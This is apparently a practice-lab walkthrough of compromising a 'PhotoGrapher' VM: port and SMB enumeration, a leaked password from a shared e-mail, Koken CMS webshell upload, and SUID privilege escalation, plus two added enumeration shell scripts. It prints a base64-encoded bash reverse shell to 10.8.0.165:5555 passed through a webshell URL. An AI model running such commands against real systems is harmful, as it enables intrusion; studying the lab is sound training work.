Port scan
Port-by-port vulnerabilities
Port 80 information gathering:
Two account names are exposed on the site:
v1n1v131r4
templated
Directory scan with dirsearch
/assets
main.js carries the template credit:
/*
Hielo by TEMPLATED
templated.co @templatedco
Released for free under the Creative Commons Attribution 3.0 license (templated.co/license)
*/
Add a hosts entry for the domain found in that credit:
172.16.33.88 templated.co
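The templated.co hostname above comes straight out of the credit banner in main.js. As an added example that is not part of the original write-up, the POSIX shell helpers below harvest hostnames and social handles from a downloaded asset (a constructed copy of that banner is embedded) and add the resulting mapping to a hosts file idempotently, so re-running the recon never duplicates lines in /etc/hosts. The function names, the baseline regexes and the scratch hosts file are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not from the write-up: triage a downloaded JS asset and
# record the hostname it leaks in a hosts file without duplicating entries.

# Constructed copy of the credit banner that dirsearch led to in /assets/main.js.
MAIN_JS_BANNER='/*
Hielo by TEMPLATED
templated.co @templatedco
Released for free under the Creative Commons Attribution 3.0 license (templated.co/license)
*/'

# harvest_domains: read text on stdin, print each distinct hostname-looking
# token (dotted labels ending in an alphabetic TLD) once per line, lowercased.
harvest_domains() {
    tr 'A-Z' 'a-z' | grep -oE '[[:alnum:]-]+(\.[[:alnum:]-]+)*\.[[:alpha:]]{2,}' | sort -u
}

# harvest_handles: print each distinct @handle token once per line.
harvest_handles() {
    grep -oE '@[[:alnum:]_]+' | sort -u
}

# add_hosts_entry FILE IP HOSTNAME
# Append "IP HOSTNAME" to FILE unless a non-comment line already maps HOSTNAME.
# Returns 0 when the entry was added, 1 when it was already present.
add_hosts_entry() {
    file=$1; ip=$2; host=$3
    [ -f "$file" ] || : > "$file"
    esc=$(printf '%s' "$host" | sed 's/\./\\./g')     # literal dots in the regex
    if grep -v '^[[:space:]]*#' "$file" | grep -qE "[[:space:]]${esc}([[:space:]]|\$)"; then
        return 1
    fi
    printf '%s %s\n' "$ip" "$host" >> "$file"
}

# Stand-alone demo: show what the banner leaks, then add the mapping to a
# scratch file (point HOSTS_FILE at /etc/hosts, as root, for the real thing).
printf '%s\n' "$MAIN_JS_BANNER" | harvest_domains
printf '%s\n' "$MAIN_JS_BANNER" | harvest_handles
scratch=${HOSTS_FILE:-$(mktemp)}
add_hosts_entry "$scratch" 172.16.33.88 templated.co && cat "$scratch"
[ -n "$HOSTS_FILE" ] || rm -f "$scratch"
```

The harvester is deliberately loose (any dotted token with an alphabetic TLD), so review its output by hand; the value is that vendor domains and handles buried in minified assets are easy to miss when scrolling, and they often double as vhost names or usernames later in the engagement.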
Port 8000 information gathering:
The site is built on Koken CMS, version 0.22.24
/admin is the login page; it requires an e-mail address and a password
SMB service information gathering
Enumerate the shares and retrieve the files in them
One of the shared files is this e-mail:
Message-ID: <[email protected]>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <[email protected]>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <[email protected]>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)
Password: babygirl (the "secret" the e-mail hints at)
Logged in to the Koken admin panel on port 8000 with it
Gaining access
The site is built on Koken
Check whether a known vulnerability exists for this version
The exploit txt found describes how to upload a PHP webshell through Koken
Visit
172.16.33.88:8000/storage/originals/48/02/test.php?cmd=echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguMC4xNjUvNTU1NSAwPiYx|%20base64%20-d|/bin/bash%20-i
# The cmd value is base64-encoded (not encrypted) and is piped through base64 -d into bash
# The encoded content is the classic bash reverse shell: /bin/bash -i >& /dev/tcp/10.8.0.165/5555 0>&1
Shell obtained on the listener
Privilege escalation
Executables with the SUID bit set (listed above); one of them is abusable
Privilege escalation successful
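The screenshot of the SUID listing is not reproduced in the text above. As an added example that is not from the original post, the POSIX shell helpers below enumerate SUID executables under a directory and split off the ones that are SUID on a stock Linux install, so the unusual candidate stands out for a GTFOBins-style check. The baseline list, the function names and the scratch files are this example's own assumptions, and the filter only narrows the search; it does not prove a binary is exploitable.

```shell
#!/bin/sh
# Added example, not from the write-up: enumerate SUID executables and
# separate them from binaries that are SUID on a stock install.

# Baseline of basenames that are normally SUID on a stock distro (assumed
# list; adjust per distro). Anything outside it deserves a closer look.
KNOWN_SUID="su sudo passwd chsh chfn gpasswd newgrp mount umount ping fusermount pkexec"

# find_suid ROOT -> every regular file under ROOT with the setuid bit, sorted
find_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# is_known_suid PATH -> 0 if the basename is in the baseline, 1 otherwise
is_known_suid() {
    name=$(basename "$1")
    for k in $KNOWN_SUID; do
        [ "$k" = "$name" ] && return 0
    done
    return 1
}

# unusual_suid ROOT -> only the SUID files whose basename is not in the baseline
unusual_suid() {
    find_suid "$1" | while IFS= read -r f; do
        is_known_suid "$f" || printf '%s\n' "$f"
    done
}

# Stand-alone demo: on a real target run "unusual_suid /"; here a scratch
# directory with constructed files (passwd and oddbin SUID, plain not) shows
# the filtering, leaving only oddbin.
demo_dir=$(mktemp -d)
for b in passwd oddbin; do : > "$demo_dir/$b"; chmod 4755 "$demo_dir/$b"; done
: > "$demo_dir/plain"; chmod 0755 "$demo_dir/plain"
unusual_suid "$demo_dir"
rm -rf "$demo_dir"
```

Run find_suid first and keep the full list: a baseline binary can still be the path to root when it is an old, vulnerable version, and the unusual list only tells you where to look first.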
Tags: en, 20, co, PhotoGrapher, practice, port, templated, koken, target VM
From: https://www.cnblogs.com/cha0s32/p/18131170